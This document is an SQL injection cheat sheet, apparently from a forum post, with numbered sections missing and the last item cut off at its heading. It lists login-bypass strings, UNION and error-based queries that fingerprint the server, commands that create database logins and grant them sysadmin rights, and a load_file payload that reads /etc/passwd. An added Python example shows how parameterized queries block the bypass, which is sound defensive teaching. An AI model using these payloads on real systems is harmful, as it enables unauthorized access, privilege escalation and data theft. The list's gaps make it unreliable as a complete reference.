Login: ' or 1=1--
Pass: ' or 1=1--
http://website/index.asp?id=' or 1=1--
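Added example (not part of the original post): why the `' or 1=1--` login payload listed above succeeds against a query built by string concatenation, and why the same input is harmless once the query uses placeholders. It assumes an in-memory SQLite database with a constructed `users` table; the function names are the example's own.

```python
# Added example, not code from the original post: vulnerable string-built
# login query beside its parameterized replacement, exercised with the
# "' or 1=1--" payload from the list above. Uses in-memory SQLite.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single user account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # User input is spliced into the SQL text, so a quote in the input closes
    # the string literal and the rest of the input is parsed as SQL; the
    # trailing "--" comments out the password check entirely.
    sql = (f"SELECT COUNT(*) FROM users WHERE name = '{user}' "
           f"AND pass = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # Placeholders bind the input as data: the quote and the "--" are compared
    # literally against the column and never reach the SQL parser.
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND pass = ?"
    return conn.execute(sql, (user, password)).fetchone()[0] > 0


def demo() -> dict:
    """Run both variants with valid credentials and with the payload."""
    conn = make_db()
    payload = "' or 1=1--"  # the login payload from the list above
    return {
        "vuln_good_creds": login_vulnerable(conn, "alice", "s3cret"),
        "vuln_payload": login_vulnerable(conn, payload, "anything"),
        "safe_good_creds": login_safe(conn, "alice", "s3cret"),
        "safe_payload": login_safe(conn, payload, "anything"),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable variant accepts the payload without a password; the parameterized variant rejects it while still accepting the real credentials.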
There are also forms like the following:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--
3. Gathering information
- ' or 1 in (select @@version)--
- ' union all select @@version--
4. Data types
Oracle database >>
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
exec sp_addlogin 'name', 'password'
exec sp_addsrvrolemember 'name', 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CREATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CREATE USER name WITH PASSWORD 'pass123'
Oracle
CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7. MySQL interactive queries
Use a UNION query to dump a file's contents, as follows:
- ' union select 1,load_file('/etc/passwd'),1,1,1;
8. System server name and configuration
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9. Finding the VNC password (registry)